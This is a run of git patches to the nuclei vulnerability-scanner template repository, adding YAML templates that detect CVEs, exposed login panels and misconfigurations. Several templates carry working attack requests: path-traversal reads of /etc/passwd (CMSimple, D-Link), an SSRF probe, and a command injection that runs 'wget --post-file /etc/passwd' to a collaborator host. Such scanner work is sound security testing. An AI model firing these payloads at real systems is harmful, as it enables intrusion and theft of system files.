"{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://burpcollabolator.net" + matchers-condition: and + matchers: + - type: status + status: + - 500 + - type: word + words: + - "Name or service not known" + part: body + - type: word + words: + - "text/plain" + part: header From 5b690a90036edf3c0470338c41376e984e99843b Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Tue, 2 Mar 2021 12:36:11 +0530 Subject: [PATCH 167/370] improving matcher --- cves/2021/CVE-2021-27330.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-27330.yaml b/cves/2021/CVE-2021-27330.yaml index f51b0d1a6b..d3ba02aaa5 100644 --- a/cves/2021/CVE-2021-27330.yaml +++ b/cves/2021/CVE-2021-27330.yaml @@ -18,7 +18,11 @@ requests: words: - "" part: body - condition: and + + - type: word + words: + - "text/html" + part: header - type: status status: From 3293ab8b6187dd709696a4868281e29d74591d20 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Mar 2021 07:13:49 +0000 Subject: [PATCH 168/370] Auto Update README [Tue Mar 2 07:13:49 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index be95c2aa0a..df3348bee0 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 215 | vulnerabilities | 104 | exposed-panels | 89 | +| cves | 216 | vulnerabilities | 104 | exposed-panels | 89 | | exposures | 55 | technologies | 47 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 649 files**. +**68 directories, 650 files**. From e93a9282933f016c383ed7c12e9203d7d2107f58 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 2 Mar 2021 13:18:13 +0530 Subject: [PATCH 169/370] CMSimple 3.1 - Local File Inclusion --- cves/2008/CVE-2008-2650.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cves/2008/CVE-2008-2650.yaml diff --git a/cves/2008/CVE-2008-2650.yaml b/cves/2008/CVE-2008-2650.yaml new file mode 100644 index 0000000000..e318728053 --- /dev/null +++ b/cves/2008/CVE-2008-2650.yaml @@ -0,0 +1,23 @@ +id: CVE-2008-2650 +info: + name: CMSimple 3.1 - Local File Inclusion + author: pussycat0x + severity: high + reference: https://www.exploit-db.com/exploits/5700 + tags: cve,cve2008,lfi +requests: + - raw: + - | + GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1 + Content-Type: application/x-www-form-urlencoded + matchers-conditions: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:[x*]:0:0:" + part: body + + From 3a9620837d3b9ba7a4bae1fc0cb083c0833562c3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 2 Mar 2021 13:22:26 +0530 Subject: [PATCH 170/370] Update CVE-2020-26948.yaml --- cves/2020/CVE-2020-26948.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-26948.yaml b/cves/2020/CVE-2020-26948.yaml index 5c325dc865..54d281ece9 100644 --- a/cves/2020/CVE-2020-26948.yaml +++ b/cves/2020/CVE-2020-26948.yaml @@ -11,7 +11,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://burpcollabolator.net" + - "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net" matchers-condition: and matchers: - type: status From bfefc14a43efca307dc4cf6f95176f43057bfb18 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Mar 2021 07:54:38 +0000 Subject: [PATCH 171/370] Auto Update README [Tue Mar 2 07:54:38 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index df3348bee0..a0ce0a4f40 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 216 | vulnerabilities | 104 | exposed-panels | 89 | +| cves | 217 | vulnerabilities | 104 | exposed-panels | 89 | | exposures | 55 | technologies | 47 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 650 files**. +**68 directories, 651 files**. From 395609c4ec5ed1c27ebea096e6a230047fe01a19 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 2 Mar 2021 13:34:01 +0530 Subject: [PATCH 172/370] Update CVE-2008-2650.yaml --- cves/2008/CVE-2008-2650.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/cves/2008/CVE-2008-2650.yaml b/cves/2008/CVE-2008-2650.yaml index e318728053..10e56ebc16 100644 --- a/cves/2008/CVE-2008-2650.yaml +++ b/cves/2008/CVE-2008-2650.yaml @@ -18,6 +18,4 @@ requests: - type: regex regex: - "root:[x*]:0:0:" - part: body - - + part: body From b5adaf7d3de5fccbc8d04964241076abb273977e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Tue, 2 Mar 2021 14:02:36 +0530 Subject: [PATCH 173/370] updated typo --- cves/2008/CVE-2008-2650.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2008/CVE-2008-2650.yaml b/cves/2008/CVE-2008-2650.yaml index 10e56ebc16..aa427af7be 100644 --- a/cves/2008/CVE-2008-2650.yaml +++ b/cves/2008/CVE-2008-2650.yaml @@ -10,7 +10,8 @@ requests: - | GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1 Content-Type: application/x-www-form-urlencoded - matchers-conditions: and + + matchers-condition: and matchers: - type: status status: From d7ff8ecfbafefcdf5b7cb042791de607b41d6e56 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Mar 2021 08:36:20 +0000 Subject: [PATCH 174/370] Auto Update README [Tue Mar 2 08:36:20 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index a0ce0a4f40..c8c24a5186 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 217 | vulnerabilities | 104 | exposed-panels | 89 | +| cves | 218 | vulnerabilities | 104 | exposed-panels | 89 | | exposures | 55 | technologies | 47 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 651 files**. +**68 directories, 652 files**. From 5e355e2141612c5be9dbc7d4362b24579e44f8e0 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Tue, 2 Mar 2021 14:08:58 +0530 Subject: [PATCH 175/370] misc updates --- .github/ISSUE_TEMPLATE/false-positive.md | 4 ++-- .github/ISSUE_TEMPLATE/submit-template.md | 7 ++++--- 2 files changed, 6 insertions(+), 5 deletions(-) diff --git a/.github/ISSUE_TEMPLATE/false-positive.md b/.github/ISSUE_TEMPLATE/false-positive.md index 2b64abc50f..866365bd95 100644 --- a/.github/ISSUE_TEMPLATE/false-positive.md +++ b/.github/ISSUE_TEMPLATE/false-positive.md @@ -1,8 +1,8 @@ --- name: False Positive about: 'Create an issue if you found false positive results. ' -title: "[false-positive] " -labels: '' +title: "[false-positive] template-name " +labels: 'false-positive' assignees: '' --- diff --git a/.github/ISSUE_TEMPLATE/submit-template.md b/.github/ISSUE_TEMPLATE/submit-template.md index a682945ed5..c929e00068 100644 --- a/.github/ISSUE_TEMPLATE/submit-template.md +++ b/.github/ISSUE_TEMPLATE/submit-template.md @@ -1,14 +1,15 @@ --- name: Submit Template about: Submit nuclei template using issue -title: "[nuclei-template] " -labels: '' +title: "[nuclei-template] template-name" +labels: 'nuclei-template' assignees: '' --- **Template Details** -``` +```yaml + nuclei template goes here ``` From c56ba051655cd36792033d7d3b446f768323624b Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Tue, 2 Mar 2021 14:20:19 +0530 Subject: [PATCH 176/370] Update CVE-2021-27330.yaml --- cves/2021/CVE-2021-27330.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-27330.yaml b/cves/2021/CVE-2021-27330.yaml index d3ba02aaa5..2af387092f 100644 --- a/cves/2021/CVE-2021-27330.yaml +++ b/cves/2021/CVE-2021-27330.yaml @@ -4,7 +4,7 @@ info: name: Triconsole 3.75 XSS author: pikpikcu severity: medium - reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27330 + reference: https://www.exploit-db.com/exploits/49597 tags: cve,cve2021,triconsole,xss requests: From 723ea552852894d5ffba506097a59dd6d929c3ed Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 2 Mar 2021 11:02:08 +0000 Subject: [PATCH 177/370] Create CVE-2021-21315.yaml --- cves/2021/CVE-2021-21315.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2021/CVE-2021-21315.yaml diff --git a/cves/2021/CVE-2021-21315.yaml b/cves/2021/CVE-2021-21315.yaml new file mode 100644 index 0000000000..472a39ab34 --- /dev/null +++ b/cves/2021/CVE-2021-21315.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-21315 + +info: + name: Node.js Systeminformation Command Injection + author: pikpikcu + severity: high + reference: https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC + tags: node.js,cve,cve2021 + +requests: + - method: GET + path: + - "{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20burpcolaborator.net)" + + matchers-condition: and + matchers: + + - type: word + words: + - "application/json" + part: header + + - type: word + words: + - "wget --post-file /etc/passwd burpcolaborator.net" + part: body + condition: and + + - type: status + status: + - 200 From 50de7f79cfa44dcb49a5fa7b0f87befe2dc23dc9 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 2 Mar 2021 18:32:14 +0700 Subject: [PATCH 178/370] Create exposed-hg.yaml --- exposures/configs/exposed-hg.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 exposures/configs/exposed-hg.yaml diff --git a/exposures/configs/exposed-hg.yaml b/exposures/configs/exposed-hg.yaml new file mode 100644 index 0000000000..471370bb53 --- /dev/null +++ b/exposures/configs/exposed-hg.yaml @@ -0,0 +1,18 @@ +id: exposed-hg + +info: + name: Exposed HG Directory + author: daffainfo + severity: medium + +requests: + - method: GET + path: + - "{{BaseURL}}/.hg/hgrc" + + matchers: + - type: word + words: + - "[paths]" + - "default" + condition: and From 8756096ecc6f017accf97524d8fd3106e05254ad Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Tue, 2 Mar 2021 18:00:32 +0530 Subject: [PATCH 179/370] Adding hivemanager-login-panel --- exposed-panels/hivemanager-login-panel.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 exposed-panels/hivemanager-login-panel.yaml diff --git a/exposed-panels/hivemanager-login-panel.yaml b/exposed-panels/hivemanager-login-panel.yaml new file mode 100644 index 0000000000..2877cb5e9d --- /dev/null +++ b/exposed-panels/hivemanager-login-panel.yaml @@ -0,0 +1,18 @@ +id: hivemanager-login-panel +info: + name: HiveManager Login panel + author: binaryfigments + severity: info + +requests: + - method: GET + path: + - '{{BaseURL}}/hm/login.action' + matchers-condition: and + matchers: + - type: word + words: + - "HiveManager Login" + - type: status + status: + - 200 From 6069f6b5a6ec1874bb94217e97fca5c270222587 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Mar 2021 12:31:03 +0000 Subject: [PATCH 180/370] Auto Update README [Tue Mar 2 12:31:03 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index c8c24a5186..8d2e21d071 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 218 | vulnerabilities | 104 | exposed-panels | 89 | +| cves | 218 | vulnerabilities | 104 | exposed-panels | 90 | | exposures | 55 | technologies | 47 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 652 files**. +**68 directories, 653 files**. From 5817aaa5399b687963a8c063ca62a622a6a3176b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 2 Mar 2021 18:39:33 +0530 Subject: [PATCH 181/370] Create sphider-login.yaml --- exposed-panels/sphider-login.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/sphider-login.yaml diff --git a/exposed-panels/sphider-login.yaml b/exposed-panels/sphider-login.yaml new file mode 100644 index 0000000000..806ef216d3 --- /dev/null +++ b/exposed-panels/sphider-login.yaml @@ -0,0 +1,25 @@ +id: sphider-login + +info: + name: Sphider Admin Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6641 + +requests: + - method: GET + path: + - '{{BaseURL}}/admin/spider.php' + - '{{BaseURL}}/sphider-search/admin/admin.php' + - '{{BaseURL}}/sphider/admin/admin.php' + - '{{BaseURL}}/search/admin/configset.php' + - '{{BaseURL}}/fileadmin/user_upload/search/admin/auth.php' + + matchers-condition: and + matchers: + - type: word + words: + - 'Sphider Admin Login' + - type: status + status: + - 200 From 85126a1a847a9766b6758f05604a9e76141203ff Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 2 Mar 2021 19:39:19 +0530 Subject: [PATCH 182/370] Create d-link-arbitary-fileread.yaml --- .../d-link-arbitary-fileread.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 misconfiguration/d-link-arbitary-fileread.yaml diff --git a/misconfiguration/d-link-arbitary-fileread.yaml b/misconfiguration/d-link-arbitary-fileread.yaml new file mode 100644 index 0000000000..49306e9ce4 --- /dev/null +++ b/misconfiguration/d-link-arbitary-fileread.yaml @@ -0,0 +1,19 @@ +id: dlink-file-read + +info: + name: D-Link Arbitrary File Read + author: dhiyaneshDK + severity: high + reference: https://suid.ch/research/DAP-2020_Preauth_RCE_Chain.html + +requests: + - method: POST + path: + - "{{BaseURL}}/cgi-bin/webproc" + body: 'getpage=html%2Findex.html&errorpage=/var/log/sysevent.txt&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=test&%3Aaction=login&%3Asessionid=365dfaef' + matchers: + - type: word + words: + - "Manufacturer: D-Link" + condition: and + part: body From c3c9becd9b21361dd33a29875d8318bad9b6507c Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Tue, 2 Mar 2021 20:16:08 +0530 Subject: [PATCH 183/370] Update sphider-login.yaml --- exposed-panels/sphider-login.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/exposed-panels/sphider-login.yaml b/exposed-panels/sphider-login.yaml index 806ef216d3..35bc2c4e27 100644 --- a/exposed-panels/sphider-login.yaml +++ b/exposed-panels/sphider-login.yaml @@ -10,10 +10,8 @@ requests: - method: GET path: - '{{BaseURL}}/admin/spider.php' - - '{{BaseURL}}/sphider-search/admin/admin.php' - '{{BaseURL}}/sphider/admin/admin.php' - - '{{BaseURL}}/search/admin/configset.php' - - '{{BaseURL}}/fileadmin/user_upload/search/admin/auth.php' + - '{{BaseURL}}/search/admin/admin.php' matchers-condition: and matchers: From 85725c81604b223e4ae2471828686b4d18cd52dd Mon Sep 17 00:00:00 2001 From: Joan Bono Date: Tue, 2 Mar 2021 16:29:08 +0100 Subject: [PATCH 184/370] Create acunetix-panel.yaml --- exposed-panels/acunetix-panel.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/acunetix-panel.yaml diff --git a/exposed-panels/acunetix-panel.yaml b/exposed-panels/acunetix-panel.yaml new file mode 100644 index 0000000000..b5af687d7c --- /dev/null +++ b/exposed-panels/acunetix-panel.yaml @@ -0,0 +1,23 @@ +id: acunetix-panel-detect + +info: + name: Acunetix Panel detector + author: joanbono + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/#/login" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + matchers-condition: and + matchers: + - type: word + words: + - 'Acunetix' + - '' + part: body + - type: status + status: + - 200 From 12f4aa87df327c342fee79a61add99ed4972c449 Mon Sep 17 00:00:00 2001 From: Joan Bono Date: Tue, 2 Mar 2021 16:29:32 +0100 Subject: [PATCH 185/370] Create checkmarx-panel.yaml --- exposed-panels/checkmarx-panel.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 exposed-panels/checkmarx-panel.yaml diff --git a/exposed-panels/checkmarx-panel.yaml b/exposed-panels/checkmarx-panel.yaml new file mode 100644 index 0000000000..f60a778943 --- /dev/null +++ b/exposed-panels/checkmarx-panel.yaml @@ -0,0 +1,18 @@ +id: checkmarx-panel-detect + +info: + name: Checkmarx WebClient detector + author: joanbono + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/cxwebclient/Login.aspx" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + matchers: + - type: word + words: + - '/CxWebClient/webApp/Scripts/libs/authenticationScripts' + part: body From 36a8272b4d3d7308a1efd7c5e8ace07059f7d6d6 Mon Sep 17 00:00:00 2001 From: Joan Bono Date: Tue, 2 Mar 2021 16:29:56 +0100 Subject: [PATCH 186/370] Create nessus-panel.yaml --- exposed-panels/nessus-panel.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/nessus-panel.yaml diff --git a/exposed-panels/nessus-panel.yaml b/exposed-panels/nessus-panel.yaml new file mode 100644 index 0000000000..20c5de9092 --- /dev/null +++ b/exposed-panels/nessus-panel.yaml @@ -0,0 +1,26 @@ +id: nessus-panel-detect + +info: + name: Nessus Panel detector + author: joanbono + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/server/status" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + matchers-condition: and + matchers: + - type: word + words: + - '{"code":200,"progress":null,"status":"ready"}' + part: body + - type: word + words: + - 'NessusWWW' + part: header + - type: status + status: + - 200 From dca16d049205ddc98f5f9661e9e3d891fa709635 Mon Sep 17 00:00:00 2001 From: Joan Bono Date: Tue, 2 Mar 2021 16:32:40 +0100 Subject: [PATCH 187/370] Create burp-api-detect.yaml --- technologies/burp-api-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/burp-api-detect.yaml diff --git a/technologies/burp-api-detect.yaml b/technologies/burp-api-detect.yaml new file mode 100644 index 0000000000..4558ae4b04 --- /dev/null +++ b/technologies/burp-api-detect.yaml @@ -0,0 +1,25 @@ +id: burp-rest-api-detect + +info: + name: Burp Rest API Server Running + author: joanbono + severity: info + reference: https://portswigger.net/burp/documentation/enterprise/api-reference + +requests: + - method: GET + path: + - "{{BaseURL}}/v0.1/" + matchers-condition: and + matchers: + - type: word + words: + - 'Burp API' + part: body + - type: word + words: + - 'X-Burp-Version' + part: header + - type: status + status: + - 200 From 8e9cb17c5611370d08ae269efbb0479785a63c1b Mon Sep 17 00:00:00 2001 From: Joan Bono Date: Tue, 2 Mar 2021 16:40:36 +0100 Subject: [PATCH 188/370] Update checkmarx-panel.yaml --- exposed-panels/checkmarx-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/checkmarx-panel.yaml b/exposed-panels/checkmarx-panel.yaml index f60a778943..eb46a385f1 100644 --- a/exposed-panels/checkmarx-panel.yaml +++ b/exposed-panels/checkmarx-panel.yaml @@ -10,7 +10,7 @@ requests: path: - "{{BaseURL}}/cxwebclient/Login.aspx" headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) matchers: - type: word words: From 74faffe02194aa8d654296a450fc909351297636 Mon Sep 17 00:00:00 2001 From: Joan Bono Date: Tue, 2 Mar 2021 16:40:57 +0100 Subject: [PATCH 189/370] Update acunetix-panel.yaml --- exposed-panels/acunetix-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/acunetix-panel.yaml b/exposed-panels/acunetix-panel.yaml index b5af687d7c..7bcc9503d6 100644 --- a/exposed-panels/acunetix-panel.yaml +++ b/exposed-panels/acunetix-panel.yaml @@ -10,7 +10,7 @@ requests: path: - "{{BaseURL}}/#/login" headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) matchers-condition: and matchers: - type: word From 74e63203b7fe1851befc557e14166f77053ecb9c Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Tue, 2 Mar 2021 21:14:29 +0530 Subject: [PATCH 190/370] Update d-link-arbitary-fileread.yaml --- misconfiguration/d-link-arbitary-fileread.yaml | 16 +++++++++++----- 1 file changed, 11 insertions(+), 5 deletions(-) diff --git a/misconfiguration/d-link-arbitary-fileread.yaml b/misconfiguration/d-link-arbitary-fileread.yaml index 49306e9ce4..c761312d44 100644 --- a/misconfiguration/d-link-arbitary-fileread.yaml +++ b/misconfiguration/d-link-arbitary-fileread.yaml @@ -10,10 +10,16 @@ requests: - method: POST path: - "{{BaseURL}}/cgi-bin/webproc" - body: 'getpage=html%2Findex.html&errorpage=/var/log/sysevent.txt&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=test&%3Aaction=login&%3Asessionid=365dfaef' + body: 'errorpage=/etc/passwd&obj-action=auth&:action=login' + + matchers-condition: and matchers: - - type: word - words: - - "Manufacturer: D-Link" - condition: and + + - type: regex + regex: + - "root:[x*]:0:0" part: body + + - type: status + status: + - 200 From 9c04590189ed0134be9ab496dfef9b57cd2f51a3 Mon Sep 17 00:00:00 2001 From: Joan Bono Date: Tue, 2 Mar 2021 16:46:51 +0100 Subject: [PATCH 191/370] Update nessus-panel.yaml --- exposed-panels/nessus-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/nessus-panel.yaml b/exposed-panels/nessus-panel.yaml index 20c5de9092..23f6fec09b 100644 --- a/exposed-panels/nessus-panel.yaml +++ b/exposed-panels/nessus-panel.yaml @@ -10,7 +10,7 @@ requests: path: - "{{BaseURL}}/server/status" headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) matchers-condition: and matchers: - type: word From c1d72cad18763574505e07c0d76278a30f3fe72a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Mar 2021 15:47:31 +0000 Subject: [PATCH 192/370] Auto Update README [Tue Mar 2 15:47:31 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 8d2e21d071..ec35c6bc52 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 218 | vulnerabilities | 104 | exposed-panels | 90 | -| exposures | 55 | technologies | 47 | misconfiguration | 49 | +| cves | 218 | vulnerabilities | 104 | exposed-panels | 91 | +| exposures | 55 | technologies | 47 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 653 files**. +**68 directories, 655 files**. From 5ad57ae1644425d0a234ed088a2167203e4b0da5 Mon Sep 17 00:00:00 2001 From: Joan Bono Date: Tue, 2 Mar 2021 16:51:57 +0100 Subject: [PATCH 193/370] Update burp-api-detect.yaml --- technologies/burp-api-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/burp-api-detect.yaml b/technologies/burp-api-detect.yaml index 4558ae4b04..f5d0fefe0f 100644 --- a/technologies/burp-api-detect.yaml +++ b/technologies/burp-api-detect.yaml @@ -9,7 +9,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/v0.1/" + - "{{BaseURL}}/v0.1/" matchers-condition: and matchers: - type: word From e12ec9828a5dfb7f31a307bbc8932a7475218675 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Tue, 2 Mar 2021 21:23:54 +0530 Subject: [PATCH 194/370] Update burp-api-detect.yaml --- technologies/burp-api-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/technologies/burp-api-detect.yaml b/technologies/burp-api-detect.yaml index f5d0fefe0f..68a7000ee7 100644 --- a/technologies/burp-api-detect.yaml +++ b/technologies/burp-api-detect.yaml @@ -10,7 +10,8 @@ requests: - method: GET path: - "{{BaseURL}}/v0.1/" - matchers-condition: and + + matchers-condition: and matchers: - type: word words: From fe6f91c6a057aca3bacdb69035f7392629bf1ae9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Mar 2021 16:01:57 +0000 Subject: [PATCH 195/370] Auto Update README [Tue Mar 2 16:01:57 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index ec35c6bc52..f0095873e0 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 218 | vulnerabilities | 104 | exposed-panels | 91 | -| exposures | 55 | technologies | 47 | misconfiguration | 50 | +| cves | 218 | vulnerabilities | 104 | exposed-panels | 94 | +| exposures | 55 | technologies | 48 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 655 files**. +**68 directories, 659 files**. From a97f89623ab1d92382e871efecc63f1b28a607f9 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Tue, 2 Mar 2021 21:37:41 +0530 Subject: [PATCH 196/370] Update exposed-hg.yaml --- exposures/configs/exposed-hg.yaml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/exposures/configs/exposed-hg.yaml b/exposures/configs/exposed-hg.yaml index 471370bb53..eb1cdf46bd 100644 --- a/exposures/configs/exposed-hg.yaml +++ b/exposures/configs/exposed-hg.yaml @@ -3,16 +3,20 @@ id: exposed-hg info: name: Exposed HG Directory author: daffainfo - severity: medium + severity: low requests: - method: GET path: - "{{BaseURL}}/.hg/hgrc" - + matchers: - type: word words: - "[paths]" - "default" condition: and + + - type: status + status: + - 200 \ No newline at end of file From fb74bf520f9967b7dccae4684af56dfcd199b9ac Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Mar 2021 16:09:15 +0000 Subject: [PATCH 197/370] Auto Update README [Tue Mar 2 16:09:15 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index f0095873e0..995990edc5 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 218 | vulnerabilities | 104 | exposed-panels | 94 | -| exposures | 55 | technologies | 48 | misconfiguration | 50 | +| exposures | 56 | technologies | 48 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | 